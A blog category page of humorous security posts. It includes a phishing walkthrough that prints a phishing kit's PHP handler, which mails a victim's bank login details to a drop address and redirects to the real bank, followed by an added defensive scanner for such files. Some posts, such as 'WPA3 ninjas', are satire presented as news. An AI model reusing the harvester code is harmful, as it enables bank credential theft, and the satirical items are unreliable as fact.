News for the ‘Security’ Category

WPA3 – New Wireless Security Standard is Ninja Based

Wireless internet security is an area that many people still struggle to understand, and they are quite happy to use weak or no encryption to protect their juicy airborne packets. Many people pride themselves on having the best firewalls and anti-virus software that money can buy, yet don’t do wifi security properly. This is basically the same as locking all the doors and windows in a three-walled house.

It is hoped that the launch of the next generation of wireless security standard will inspire people to sort out their wireless security.

So what’s so good about WPA3? Well, to answer that, you first have to look at which alternatives are available.

No security – As you would imagine, no security means no security. You are like Tesco, open 24 hours a day.

WEP – Weak encryption. Takes about 5 minutes to break, or less depending on how much data is floating around.

WPA/WPA2 – Stronger encryption, almost impossible to break if a strong passphrase is used. The best most home users can use, without having to do some technically advanced setting up of stuff.

WPA3 is basically WPA2 + the instalment of a Ninja, who will wander around the range of your wireless network and physically remove people who are trying to connect. You don’t have to feed or water the Ninja; they are completely self-sufficient. The Ninja based system is almost impossible to attack successfully, because everyone knows Ninjas are ace.

WPA3 Ninja - Ace.

Problems arise when two different WPA3 protected networks overlap, if they are both using the same wifi channel. During beta testing several Ninja vs. Ninja battles were reported, however many of them were set up on purpose by developers for their own entertainment.

WPA3 enabled equipment will start rolling out in April. Look out for boxes labelled “supports 802.11WITCHA”.

Posted: January 28th, 2010
Categories: Security

France: Nous détestons Internet Explorer

The French government has officially told its peeps to stop using Internet Explorer 6, due to multiple exploits in it that could allow hackers to take over the host computer. Common sense really, seeing as IE6 is two versions out of date. They have suggested alternatives including the beautifully crafted Mozilla Firefox (fair enough), and Google Chrome (about as secure as a Northern Rock mortgage).

They have also announced plans to release their own browser, to keep citizens safe.

Called “Le Navigateur”, it has a feel similar to Apple Safari and includes several enhanced protection features, including filtering of dangerous or upsetting content and a “surrender” button, should a user find themselves in a heated chat room argument that could turn nasty.

Thanks to an insider, known only as Jacques, we have an exclusive screen shot of Le Navigateur.

An example of Le Navigateur's Content Filtering

Posted: January 20th, 2010
Categories: Security

Gone Phishin’

Phishing emails are now a regular sight in the world’s inboxes. Most work by pretending to be from a bank, asking for personal details to “verify security”. Most go straight to the junk mail folder, never to be seen by man. If they get through to the inbox, the grammar used in the message body typically resembles that of an 8-year-old child. Apart from the Baby MD at Velvet, white-collar child employment remains at an all-time low, so most people work out that the message is a fake. However, there are still lots of people who fall for these tricks.

When I get a Phishing email I tend to examine it, to learn more about the way it works. I got a classic example today, so I’ll share with you how it works.

Delivery – It starts with an email, in this example – the message is supposed to be from HSBC.

Step One: Victim receives poorly worded Email, not from a drunk friend.

So I have to click on the link at the bottom, fair enough, it goes to hsbc.co.uk right? Err, actually no. Hovering the mouse over the link reveals it takes you to a random website. This could be any site that has been hacked, and had the phishing site files uploaded to it. In this case it was a photo framing company.

Reel Big Phish - So the victim clicks the link and heads off to the fake bank site. It looks pretty genuine. Internet Explorer and Firefox will alert if the site has been reported as a phishing site, so if this is a relatively new phish you may not get a warning. In this case IE did tell me I shouldn’t go to the site. I’ve removed the site’s domain name from the URL to protect the company in question, but you can see that the fake site has been set up in a subdirectory of the hacked site.

Step Two: This site is to HSBC as Katie Price is to Boobs.

Entering Details – So the victim enters their login details. The details are then secretly emailed to the phishermen (the bad guys who set up the site). Once the continue button has been pressed the victim is redirected to the real HSBC site, and told they have entered an incorrect password. They try again, and this time they log in to the genuine site and think nothing of it – until they notice money missing from their bank account a few days later. All very scary.

So how exactly does the fake site email the details to the bad guys? Well, kindly, on this example the phishermen left an entire copy of the fake site in a zip file, so it is possible to examine the source code of the fake pages and find out. Source code is basically a list of instructions performed by the server hosting a site. There are two elements to source code in web site development, client side and server side. Client side code renders the page in your browser, so you can always see the results of client side code execution and even view the code if you want to. Server side code is executed on the web server, and is not normally visible to end users. That’s us.

So in this example when a user enters details and presses the continue button, the following code is executed on the server side.

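<?php
// Runs on the hacked server when the victim presses the continue button.

$ip = getenv("REMOTE_ADDR");          // victim's IP address
$do = "mail";                          // function name held in a variable, called indirectly below
$message .= "--------------USER-----------------------\n";
$message .= "User ID         : ".$_POST['user']."\n";
$message .= "Date of Birth         : ".$_POST['dob']."\n";
$message .= "Security Number   : ".$_POST['securityno']."\n";
$message .= "IP                     : ".$ip."\n";
$message .= "--------------I MUST RICH---------------\n";
$send = "hacker1@randomfreeemailsite.com";   // drop address (changed from the real one)
$subject = "HSBC UK | $user | $ip";
$headers = "From: HSBC <hsbc@bank.co.uk>";
$headers .= $_POST['name']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
{
mail($send,$subject,$message,$headers);
                // second send through the variable function name; $er is not set anywhere in this file
                $do($er,$subject,$message,$headers);
}
// hand the victim over to the genuine site
header("Location:https://www.hsbc.co.uk/1/screens/html/SessionWarning/jsp/ExitFusedSite.jsp");
?>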

This code does the following – collect the remote IP address of the victim, then get the values entered for User ID, Date of Birth and Security Number. Then mail this information to the email address specified in the code. The email address is usually set up on a free email host; in this example I have changed the actual email addresses used by the bad guys. Then finally it redirects the victim to the real HSBC site. Crafty swines.
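For the owner of a site like the hacked photo framing company, the three steps just listed (read posted form fields, mail them out, redirect to an off-site URL) make a usable search pattern for PHP files that should not be in the web root. The scanner below is an added example, not code from the original post: all names are this example's own, both PHP samples are constructed, and the match is a heuristic that will need tuning against a site's legitimate form handlers.

```python
import re
from pathlib import Path

# Traits of the handler shown above; trait names are this example's own.
TRAITS = {
    "reads_post": re.compile(r"\$_POST\s*\["),
    "sends_mail": re.compile(r"\bmail\s*\(", re.I),
    "offsite_redirect": re.compile(r"header\s*\(\s*[\"']Location:\s*https?://", re.I),
    "logs_client_ip": re.compile(r"REMOTE_ADDR"),
    "variable_call": re.compile(r"\$\w+\s*\(\s*\$"),  # e.g. $do($er, ...)
}
REQUIRED = {"reads_post", "sends_mail", "offsite_redirect"}

# Constructed samples: a cut-down handler in the style above, and a normal contact form.
HARVESTER = r'''<?php
$ip = getenv("REMOTE_ADDR");
$do = "mail";
$message = "User ID: ".$_POST['user']."\n";
mail($send, $subject, $message, $headers);
$do($er, $subject, $message, $headers);
header("Location:https://bank.example/session-expired");
'''
CONTACT_FORM = r'''<?php
$body = "Message: ".$_POST['msg']."\n";
mail("owner@shop.example", "Enquiry", $body);
header("Location: /thanks.php");
'''

def traits(source):
    """Names of every trait whose pattern appears in the PHP source text."""
    return {name for name, rx in TRAITS.items() if rx.search(source)}

def is_suspect(source):
    """True when the file reads POST data, mails it and redirects off-site."""
    return REQUIRED <= traits(source)

def scan_webroot(root):
    """Return (relative path, sorted traits) for each suspect .php file under root."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        found = traits(path.read_text(errors="replace"))
        if REQUIRED <= found:
            hits.append((path.relative_to(root).as_posix(), sorted(found)))
    return hits
```

The contact form shares two of the three required traits and is not flagged because its redirect stays on the same site; the off-site redirect is what separates the two samples.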

So, a general rule, never follow links in emails. You don’t wanna get caught by the phishermen!

Posted: November 22nd, 2009
Categories: Security

iPhone Worm just got more Hungry

Yesterday I wrote about the first worm to attack the iPhone; I mentioned how it wasn’t all that nasty, but probably would inspire nasty worms. I was right, yay! “iPhone-Privacy-A” – This works on the same principle as the RickRolling worm, but it’ll steal user data and then delete it, without letting you know it’s been there. Nice. So be careful, and like I said yesterday if you use a Jail-Broken iPhone with SSH installed – change the password!

Posted: November 11th, 2009
Categories: Security

Worm Takes a Bite Out Of Apple…sort of..

The first “Worm” to attack the Apple iPhone has been created and deployed into the wild in Australia, where it is spreading like…erm…yeah I won’t say that, probably a bit too soon. There have been various other exploits against iPhones in the past, but this is slightly different: as it is a worm, it quickly self-replicates and spreads, a bit like Davina McCall.

There are two reasons why you shouldn’t panic. One – it ain’t a nasty worm. It changes the wallpaper on the iPhone to a pic of Rick Astley. In fact, if Rick Astley had an iPhone, he probably wouldn’t mind getting the worm. Two – it only affects “Jailbroken” iPhones, that is iPhones that have been modded to remove Apple’s in-built security and have secure shell (SSH) installed. It spreads using SSH and the default root password, which is “alpine”. So really, it’s more of a Linux worm.

The time to panic will come if malicious hackers start to build cleverer payloads, that steal or destroy the phone’s contents. Which, trust me, they will. In fact, they probably already have. It’s worth remembering, if you have an iPhone, or even an iPod, it should be treated in exactly the same manner as your home PC or laptop when it comes to security, because it is a tiny computer.

The number of iPhones in the wild has jumped significantly today, as Orange customers in the UK can now go get one, and I’m sure a few O2 customers have jumped ship too. Go and check out the difference in the two providers’ 3G networks if you want to know why!

Now I’m going to go eat some fruit, what with all this talk of apples and oranges…

Posted: November 10th, 2009
Categories: Security